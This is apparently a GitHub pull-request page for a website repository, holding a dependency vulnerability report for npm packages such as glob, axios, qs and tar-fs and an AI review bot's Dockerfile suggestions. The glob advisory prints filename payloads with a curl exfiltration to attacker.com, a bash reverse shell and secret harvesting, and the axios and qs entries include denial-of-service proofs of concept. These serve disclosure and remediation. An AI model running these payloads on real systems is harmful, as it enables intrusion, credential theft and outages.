This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).

critical: 0 high: 1 medium: 0 low: 0 qs 6.14.0 (npm)

pkg:npm/qs@6.14.0

high 8.7: CVE-2025-15284 Improper Input Validation

Affected range: <6.14.1
Fixed version: 6.14.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.150%
EPSS Percentile: 36th percentile

See the qs 6.13.0 entry above for the full description, PoC, impact details, and suggested fix for this CVE.

critical: 0 high: 1 medium: 0 low: 0 jws 4.0.0 (npm)

pkg:npm/jws@4.0.0

high 7.5: CVE-2025-65945 Improper Verification of Cryptographic Signature

Affected range: =4.0.0
Fixed version: 4.0.1
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
EPSS Score: 0.009%
EPSS Percentile: 1st percentile
Description

Overview

An improper signature verification vulnerability exists when using auth0/node-jws with the HS256 algorithm under specific conditions.

Am I Affected?

You are affected by this vulnerability if you meet all of the following preconditions:

  1. Application uses the auth0/node-jws implementation of JSON Web Signatures, versions <=3.2.2 || 4.0.0
  2. Application uses the jws.createVerify() function for HMAC algorithms
  3. Application uses user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

You are NOT affected by this vulnerability if you meet any of the following preconditions:

  1. Application uses the jws.verify() interface (note: auth0/node-jsonwebtoken users fall into this category and are therefore NOT affected by this vulnerability)
  2. Application uses only asymmetric algorithms (e.g. RS256)
  3. Application doesn’t use user-provided data from the JSON Web Signature Protected Header or Payload in the HMAC secret lookup routines

Fix

Upgrade auth0/node-jws version to version 3.2.3 or 4.0.1

Acknowledgement

Okta would like to thank Félix Charette for discovering this vulnerability.

critical: 0 high: 1 medium: 0 low: 0 connect-multiparty 2.2.0 (npm)

pkg:npm/connect-multiparty@2.2.0

high 7.8: CVE-2022-29623 Unrestricted Upload of File with Dangerous Type

Affected range: <=2.2.0
Fixed version: Not Fixed
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.448%
EPSS Percentile: 63rd percentile
Description

An arbitrary file upload vulnerability in the file upload module of Express Connect-Multiparty 2.2.0 allows attackers to execute arbitrary code via a crafted PDF file. NOTE: the Supplier has not verified this vulnerability report.

critical: 0 high: 1 medium: 0 low: 0 glob 10.4.5 (npm)

pkg:npm/glob@10.4.5

high 7.5: CVE-2025-64756 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Affected range: >=10.2.0, <10.5.0
Fixed version: 11.1.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
EPSS Score: 0.038%
EPSS Percentile: 11th percentile
Description

Summary

The glob CLI contains a command injection vulnerability in its -c/--cmd option that allows arbitrary command execution when processing files with malicious names. When glob -c <command> <patterns> is used, matched filenames are passed to a shell with shell: true, enabling shell metacharacters in filenames to trigger command injection and achieve arbitrary code execution under the user or CI account privileges.

Details

Root Cause:
The vulnerability exists in src/bin.mts:277 where the CLI collects glob matches and executes the supplied command using foregroundChild() with shell: true:

stream.on('end', () => foregroundChild(cmd, matches, { shell: true }))

Technical Flow:

  1. User runs glob -c <command> <pattern>
  2. CLI finds files matching the pattern
  3. Matched filenames are collected into an array
  4. Command is executed with matched filenames as arguments using shell: true
  5. Shell interprets metacharacters in filenames as command syntax
  6. Malicious filenames execute arbitrary commands

Affected Component:

  • CLI Only: The vulnerability affects only the command-line interface
  • Library Safe: The core glob library API (glob(), globSync(), streams/iterators) is not affected
  • Shell Dependency: Exploitation requires shell metacharacter support (primarily POSIX systems)

Attack Surface:

  • Files with names containing shell metacharacters: $(), backticks, ;, &, |, etc.
  • Any directory where attackers can control filenames (PR branches, archives, user uploads)
  • CI/CD pipelines using glob -c on untrusted content

PoC

Setup Malicious File:

mkdir test_directory && cd test_directory

# Create file with command injection payload in filename
touch '$(touch injected_poc)'

Trigger Vulnerability:

# Run glob CLI with -c option
node /path/to/glob/dist/esm/bin.mjs -c echo "**/*"

Result:

  • The echo command executes normally
  • Additionally: The $(touch injected_poc) in the filename is evaluated by the shell
  • A new file injected_poc is created, proving command execution
  • Any command can be injected this way with full user privileges

Advanced Payload Examples:

Data Exfiltration:

# Filename: $(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)
touch '$(curl -X POST https://attacker.com/exfil -d "$(whoami):$(pwd)" > /dev/null 2>&1)'

Reverse Shell:

# Filename: $(bash -i >& /dev/tcp/attacker.com/4444 0>&1)
touch '$(bash -i >& /dev/tcp/attacker.com/4444 0>&1)'

Environment Variable Harvesting:

# Filename: $(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)
touch '$(env | grep -E "(TOKEN|KEY|SECRET)" > /tmp/secrets.txt)'

Impact

Arbitrary Command Execution:

  • Commands execute with full privileges of the user running glob CLI
  • No privilege escalation required - runs as current user
  • Access to environment variables, file system, and network

Real-World Attack Scenarios:

1. CI/CD Pipeline Compromise:

  • Malicious PR adds files with crafted names to repository
  • CI pipeline uses glob -c to process files (linting, testing, deployment)
  • Commands execute in CI environment with build secrets and deployment credentials
  • Potential for supply chain compromise through artifact tampering

2. Developer Workstation Attack:

  • Developer clones repository or extracts archive containing malicious filenames
  • Local build scripts use glob -c for file processing
  • Developer machine compromise with access to SSH keys, tokens, local services

3. Automated Processing Systems:

  • Services using glob CLI to process uploaded files or external content
  • File uploads with malicious names trigger command execution
  • Server-side compromise with potential for lateral movement

4. Supply Chain Poisoning:

  • Malicious packages or themes include files with crafted names
  • Build processes using glob CLI automatically process these files
  • Wide distribution of compromise through package ecosystems

Platform-Specific Risks:

  • POSIX/Linux/macOS: High risk due to flexible filename characters and shell parsing
  • Windows: Lower risk due to filename restrictions, but vulnerability persists with PowerShell, Git Bash, WSL
  • Mixed Environments: CI systems often use Linux containers regardless of developer platform

Affected Products

  • Ecosystem: npm
  • Package name: glob
  • Component: CLI only (src/bin.mts)
  • Affected versions: v10.2.0 through v11.0.3 (and likely later versions until patched)
  • Introduced: v10.2.0 (first release with CLI containing -c/--cmd option)
  • Patched versions: 11.1.0 and 10.5.0

Scope Limitation:

  • Library API Not Affected: Core glob functions (glob(), globSync(), async iterators) are safe
  • CLI-Specific: Only the command-line interface with -c/--cmd option is vulnerable

Remediation

  • Upgrade to glob@10.5.0, glob@11.1.0, or higher, as soon as possible.
  • If any glob CLI actions fail, convert commands containing positional arguments to use the --cmd-arg/-g option instead.
  • As a last resort, use --shell to keep the shell: true behavior until glob v12, but take care to ensure that no untrusted content can appear in the file path results.
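
Since only the CLI is affected, another option is to replace glob -c invocations with a small Node script that uses the unaffected library API and spawns the command without a shell. A minimal sketch, assuming glob v10+; the script name and option choices are illustrative:

// safe-glob-cmd.js - run a command over glob matches without invoking a shell
const { glob } = require('glob');
const { execFileSync } = require('node:child_process');

async function runOverMatches(cmd, pattern) {
  const matches = await glob(pattern, { nodir: true });
  if (matches.length === 0) return;
  // execFile passes matches as argv entries, so shell metacharacters
  // in filenames are never interpreted as command syntax
  execFileSync(cmd, matches, { stdio: 'inherit' });
}

runOverMatches(process.argv[2], process.argv[3]).catch((err) => {
  console.error(err);
  process.exit(1);
});

Invoked as node safe-glob-cmd.js echo '**/*', the $(touch injected_poc) filename from the PoC above reaches echo as a literal argument instead of being evaluated by a shell.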
critical: 0 high: 1 medium: 0 low: 0 async 0.9.2 (npm)

pkg:npm/async@0.9.2

high 7.8: CVE-2021-43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range: <2.6.4
Fixed version: 2.6.4, 3.2.2
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.706%
EPSS Percentile: 72nd percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

critical: 0 high: 1 medium: 0 low: 0 linkifyjs 4.2.0 (npm)

pkg:npm/linkifyjs@4.2.0

high 8.8: CVE-2025-8101 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')

Affected range: <4.3.2
Fixed version: 4.3.2
CVSS Score: 8.8
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N
EPSS Score: 0.123%
EPSS Percentile: 32nd percentile
Description

Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution') vulnerability in Linkify (linkifyjs) allows XSS targeting HTML attributes and manipulation of user-controlled variables. This issue affects Linkify from 4.3.1 before 4.3.2.

critical: 0 high: 1 medium: 0 low: 0 axios 1.8.4 (npm)

pkg:npm/axios@1.8.4

high 7.5: CVE-2025-58754 Allocation of Resources Without Limits or Throttling

Affected range: >=1.0.0 <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.109%
EPSS Percentile: 30th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength entirely and decodes the full payload into memory on Node before streaming, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 POST requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
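
Until such a fix lands in axios, an application-side guard can approximate the missing check by rejecting oversized data: URIs before they ever reach the adapter. A minimal sketch; the wrapper name and the 1 MB cap are illustrative, not part of the axios API:

const axios = require('axios');

const MAX_DATA_URI_BYTES = 1024 * 1024; // illustrative 1 MB cap

async function safeGet(url, config = {}) {
  if (typeof url === 'string' && url.startsWith('data:')) {
    // Base64 inflates data by ~4/3, so the decoded size is roughly 3/4 of the payload length
    const payload = url.slice(url.indexOf(',') + 1);
    const approxDecodedBytes = Math.ceil(payload.length * 0.75);
    if (approxDecodedBytes > MAX_DATA_URI_BYTES) {
      throw new Error(`data: URI too large (~${approxDecodedBytes} bytes)`);
    }
  }
  return axios.get(url, config);
}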

critical: 0 high: 1 medium: 0 low: 0 tar-fs 3.0.9 (npm)

pkg:npm/tar-fs@3.0.9

high 8.7: CVE-2025-59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: >=3.0.0 <3.1.1
Fixed version: 3.1.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.028%
EPSS Percentile: 7th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }
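
For context, a complete extraction call wired to that ignore option might look like the following sketch; the archive and output paths are illustrative:

const fs = require('node:fs');
const tar = require('tar-fs');

// only regular files and directories are extracted; everything else is skipped
fs.createReadStream('./upload.tar')
  .pipe(tar.extract('./output', {
    ignore (_, header) {
      // pass files & directories, ignore e.g. symlinks
      return header.type !== 'file' && header.type !== 'directory'
    }
  }));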

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 tar-fs 2.1.3 (npm)

pkg:npm/tar-fs@2.1.3

high 8.7: CVE-2025-59343 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range: >=2.0.0 <2.1.4
Fixed version: 2.1.4
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N
EPSS Score: 0.028%
EPSS Percentile: 7th percentile
Description

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

  ignore (_, header) {
    // pass files & directories, ignore e.g. symlinks
    return header.type !== 'file' && header.type !== 'directory'
  }

Credit

Reported by: Mapta / BugBunny_ai

critical: 0 high: 1 medium: 0 low: 0 qs 6.5.3 (npm)

pkg:npm/qs@6.5.3

high 8.7: CVE-2025-15284 Improper Input Validation

Affected range: <6.14.1
Fixed version: 6.14.1
CVSS Score: 8.7
CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score: 0.150%
EPSS Percentile: 36th percentile
Description

Summary

The arrayLimit option in qs does not enforce limits for bracket notation (a[]=1&a[]=2), allowing attackers to cause denial-of-service via memory exhaustion. Applications using arrayLimit for DoS protection are vulnerable.

Details

The arrayLimit option only checks limits for indexed notation (a[0]=1&a[1]=2) but completely bypasses it for bracket notation (a[]=1&a[]=2).

Vulnerable code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = utils.combine([], leaf);  // No arrayLimit check
}

Working code (lib/parse.js:175):

else if (index <= options.arrayLimit) {  // Limit checked here
    obj = [];
    obj[index] = leaf;
}

The bracket notation handler at line 159 uses utils.combine([], leaf) without validating against options.arrayLimit, while indexed notation at line 175 checks index <= options.arrayLimit before creating arrays.

PoC

Test 1 - Basic bypass:

npm install qs
const qs = require('qs');
const result = qs.parse('a[]=1&a[]=2&a[]=3&a[]=4&a[]=5&a[]=6', { arrayLimit: 5 });
console.log(result.a.length);  // Output: 6 (should be max 5)

Test 2 - DoS demonstration:

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Configuration:

  • arrayLimit: 5 (test 1) or arrayLimit: 100 (test 2)
  • Use bracket notation: a[]=value (not indexed a[0]=value)

Impact

Denial of Service via memory exhaustion. Affects applications using qs.parse() with user-controlled input and arrayLimit for protection.

Attack scenario:

  1. Attacker sends HTTP request: GET /api/search?filters[]=x&filters[]=x&...&filters[]=x (100,000+ times)
  2. Application parses with qs.parse(query, { arrayLimit: 100 })
  3. qs ignores limit, parses all 100,000 elements into array
  4. Server memory exhausted → application crashes or becomes unresponsive
  5. Service unavailable for all users

Real-world impact:

  • Single malicious request can crash server
  • No authentication required
  • Easy to automate and scale
  • Affects any endpoint parsing query strings with bracket notation

Suggested Fix

Add arrayLimit validation to the bracket notation handler. The code already calculates currentArrayLength at line 147-151, but it's not used in the bracket notation handler at line 159.

Current code (lib/parse.js:159-162):

if (root === '[]' && options.parseArrays) {
    obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
        ? []
        : utils.combine([], leaf);  // No arrayLimit check
}

Fixed code:

if (root === '[]' && options.parseArrays) {
    // Use currentArrayLength already calculated at line 147-151
    if (options.throwOnLimitExceeded && currentArrayLength >= options.arrayLimit) {
        throw new RangeError('Array limit exceeded. Only ' + options.arrayLimit + ' element' + (options.arrayLimit === 1 ? '' : 's') + ' allowed in an array.');
    }
    
    // If limit exceeded and not throwing, convert to object (consistent with indexed notation behavior)
    if (currentArrayLength >= options.arrayLimit) {
        obj = options.plainObjects ? { __proto__: null } : {};
        obj[currentArrayLength] = leaf;
    } else {
        obj = options.allowEmptyArrays && (leaf === '' || (options.strictNullHandling && leaf === null))
            ? []
            : utils.combine([], leaf);
    }
}

This makes bracket notation behaviour consistent with indexed notation, enforcing arrayLimit and converting to object when limit is exceeded (per README documentation).
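
Until a patched qs release is in place, callers can also add a defensive layer of their own around qs.parse. A minimal sketch; the helper name and limits are illustrative, and it only inspects top-level arrays:

const qs = require('qs');

const MAX_QUERY_LENGTH = 10000;  // illustrative cap on the raw query string
const MAX_ARRAY_ITEMS = 100;

function parseQuerySafely(query) {
  // reject oversized input before qs allocates anything
  if (query.length > MAX_QUERY_LENGTH) {
    throw new RangeError('query string too long');
  }
  const parsed = qs.parse(query, { arrayLimit: MAX_ARRAY_ITEMS });
  // trim top-level arrays that slipped past arrayLimit via bracket notation
  for (const [key, value] of Object.entries(parsed)) {
    if (Array.isArray(value) && value.length > MAX_ARRAY_ITEMS) {
      parsed[key] = value.slice(0, MAX_ARRAY_ITEMS);
    }
  }
  return parsed;
}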

critical: 0 high: 1 medium: 0 low: 0 async 1.5.2 (npm)

pkg:npm/async@1.5.2

high 7.8: CVE-2021-43138 OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities

Affected range: <2.6.4
Fixed version: 2.6.4, 3.2.2
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 0.706%
EPSS Percentile: 72nd percentile
Description

A vulnerability exists in Async through 3.2.1 (fixed in 3.2.2), which could let a malicious user obtain privileges via the mapValues() method.

Contributor

@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 5

🤖 Fix all issues with AI agents
In `@Dockerfile`:
- Around line 3-4: The Dockerfile uses ARG NODE_ENV=production which is
build-time only; update the runtime stage to export NODE_ENV so it exists in
containers (e.g., in the final stage set ENV NODE_ENV=${NODE_ENV} or explicitly
ENV NODE_ENV=production) and mirror this for any other ARGs noted (lines 18-22);
locate the ARG NODE_ENV declaration and the final/runtime stage in the
Dockerfile and add the ENV assignment there so the runtime process sees
NODE_ENV=production.
- Around line 12-13: The runtime image currently copies the whole /app including
node_modules built with devDependencies (the RUN npm ci $NPM_INSTALL_FLAGS
step), so prune devDependencies before the final COPY to shrink the image and
reduce attack surface: after installing in the build stage (where RUN npm ci
$NPM_INSTALL_FLAGS runs), run a production-only prune (e.g., npm prune
--production or install with production-only flags / NPM_CONFIG_PRODUCTION) or
remove dev deps from /app/node_modules, then copy only the pruned
/app/node_modules into the runtime stage so the final image does not contain
devDependencies.
- Line 1: Update the Docker base image to a supported LTS by replacing the FROM
reference "FROM node:23-alpine" with a current LTS tag (e.g., "FROM
node:24-alpine" or "FROM node:22-alpine") so the container uses a maintained
Node release; ensure any related build/test scripts or CI that reference node:23
are updated accordingly.
- Around line 26-27: The Dockerfile pins wget to an invalid Alpine revision (RUN
apk add --no-cache wget=1.25.0-r1) which fails on node:23-alpine (Alpine 3.21);
fix by either changing the base image to a fixed Alpine release tag (e.g.,
node:23-alpine3.21) or removing the package revision pin (use RUN apk add
--no-cache wget or pin to wget=1.25.0-r0), and update the RUN line accordingly
so it matches the available package in the chosen base image.

In `@website/package.json`:
- Line 7: The start script currently uses "pm2-runtime app.js -i max" which can
oversubscribe CPUs in containers; change the "start" script (package.json
"start") to read an environment variable like PM2_INSTANCES and pass that to
pm2-runtime instead of "-i max", and ensure the container entrypoint or a small
startup helper (e.g., scripts/generate_constants.js or a new
scripts/detect_pm2_instances.sh invoked before pm2-runtime) computes a safe
default from cgroup CPU limits and sets PM2_INSTANCES when it is not provided.

@@ -1,38 +1,39 @@
FROM node:23-alpine
FROM node:23-alpine AS build

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

# First, find and read the Dockerfile
find . -name "Dockerfile" -type f

Repository: speedandfunction/website

Length of output: 105


🌐 Web query:

Node.js LTS versions 2025 2026 current supported versions

💡 Result:

Currently supported Node.js major versions (as of Jan 29, 2026)

  • Node.js 25.xCurrent (not LTS); supported until Jun 1, 2026 (EOL). [2]
  • Node.js 24.x (Krypton)Active LTS; EOL Apr 30, 2028. [1][2]
  • Node.js 22.x (Jod)Maintenance LTS; EOL Apr 30, 2027. [1][2]
  • Node.js 20.x (Iron)Maintenance LTS; EOL Apr 30, 2026. [1][2]

LTS status across 2025–2026 (key transitions)

  • Node.js 24.x: released May 6, 2025, entered Active LTS on Oct 28, 2025, enters Maintenance on Oct 20, 2026. [2]
  • Node.js 22.x: entered Maintenance LTS on Oct 21, 2025 (so it was Active LTS before that). [2]
  • Node.js 20.x: in Maintenance LTS throughout 2025 and into early 2026; EOL Apr 30, 2026. [2]
  • Node.js 18.x: reached EOL Apr 30, 2025 (not supported after that). [1]

Sources: Node.js official releases list [1] and the Node.js Release WG schedule (authoritative lifecycle dates) [2].


🏁 Script executed:

# Read the main Dockerfile to verify the content at lines 1 and 18
cat -n ./Dockerfile | head -30

Repository: speedandfunction/website

Length of output: 950


Switch from Node 23 to a supported LTS version.

Node 23 is out of security support. Use Node 24 (Active LTS until Apr 2028) or Node 22 (Maintenance LTS until Apr 2027). Avoid Node 20 as it EOLs Apr 30, 2026.

🔧 Suggested change
-FROM node:23-alpine AS build
+FROM node:24-alpine AS build
...
-FROM node:23-alpine
+FROM node:24-alpine

Also applies to: 18-18

🧰 Tools
🪛 Checkov (3.2.334)

[low] 1-39: Ensure that HEALTHCHECK instructions have been added to container images

(CKV_DOCKER_2)

🤖 Prompt for AI Agents
In `@Dockerfile` at line 1, Update the Docker base image to a supported LTS by
replacing the FROM reference "FROM node:23-alpine" with a current LTS tag (e.g.,
"FROM node:24-alpine" or "FROM node:22-alpine") so the container uses a
maintained Node release; ensure any related build/test scripts or CI that
reference node:23 are updated accordingly.

Comment on lines +3 to +4
ARG NODE_ENV=production
ARG NPM_INSTALL_FLAGS=

⚠️ Potential issue | 🟠 Major

NODE_ENV build ARG doesn’t carry into runtime.

ARG is build‑time only, so the runtime container will default to development unless the env is set elsewhere. Ensure NODE_ENV=production is set in the runtime stage.

🔧 Suggested change
 FROM node:23-alpine
+ARG NODE_ENV=production
+ENV NODE_ENV=$NODE_ENV

Also applies to: 18-22

🤖 Prompt for AI Agents
In `@Dockerfile` around lines 3 - 4, The Dockerfile uses ARG NODE_ENV=production
which is build-time only; update the runtime stage to export NODE_ENV so it
exists in containers (e.g., in the final stage set ENV NODE_ENV=${NODE_ENV} or
explicitly ENV NODE_ENV=production) and mirror this for any other ARGs noted
(lines 18-22); locate the ARG NODE_ENV declaration and the final/runtime stage
in the Dockerfile and add the ENV assignment there so the runtime process sees
NODE_ENV=production.

Comment on lines +12 to +13
# Install dependencies based on environment and flags
RUN npm ci $NPM_INSTALL_FLAGS

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🏁 Script executed:

fd -t f Dockerfile | head -20

Repository: speedandfunction/website

Length of output: 101


🏁 Script executed:

cat -n Dockerfile

Repository: speedandfunction/website

Length of output: 1157


🏁 Script executed:

cat -n website/package.json | head -30

Repository: speedandfunction/website

Length of output: 1350


🏁 Script executed:

cat -n website/package.json | tail -50

Repository: speedandfunction/website

Length of output: 1865


Remove devDependencies from runtime image.

Multi-stage build copies entire /app including node_modules with devDependencies from the build stage. Prune dev dependencies before copying to runtime to reduce image size and attack surface.

🔧 Suggested change
-RUN npm ci $NPM_INSTALL_FLAGS
+RUN npm ci $NPM_INSTALL_FLAGS \
+  && npm prune --omit=dev

Also applies to: 30-30

🤖 Prompt for AI Agents
In `@Dockerfile` around lines 12 - 13, The runtime image currently copies the
whole /app including node_modules built with devDependencies (the RUN npm ci
$NPM_INSTALL_FLAGS step), so prune devDependencies before the final COPY to
shrink the image and reduce attack surface: after installing in the build stage
(where RUN npm ci $NPM_INSTALL_FLAGS runs), run a production-only prune (e.g.,
npm prune --production or install with production-only flags /
NPM_CONFIG_PRODUCTION) or remove dev deps from /app/node_modules, then copy only
the pruned /app/node_modules into the runtime stage so the final image does not
contain devDependencies.

Comment on lines +26 to +27
# Install dependencies needed for health checks with pinned version
RUN apk add --no-cache wget=1.25.0-r1

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

cd /dev/null && find . -name "Dockerfile" -type f 2>/dev/null | head -20
